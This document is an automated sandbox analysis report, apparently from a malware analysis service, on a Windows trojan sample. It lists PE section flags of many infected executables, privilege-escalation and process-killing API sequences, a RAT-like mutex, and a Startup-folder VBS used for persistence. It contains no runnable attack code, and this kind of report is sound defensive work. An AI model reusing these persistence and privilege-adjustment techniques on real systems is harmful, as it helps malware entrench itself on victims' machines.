              Source: 7zFM.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zG.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Acrobat.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcrobatInfo.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: default-browser-agent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info_x64.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: notification_click_helper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7z.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zFM.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zG.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Acrobat.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcrobatInfo.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@36/157@327/21
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,1_2_00464EAE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,3_2_00464EAE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-98KSNN
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-73722fd785394ff77d8e3ee9-b
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-73722fd785394ff7-inf
              Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-73722fd785394ff79ea72c54-b
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile created: C:\Users\user\AppData\Local\Temp\woolpressJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
              Source: tyRPPK48Mk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile read: C:\Users\desktop.iniJump to behavior
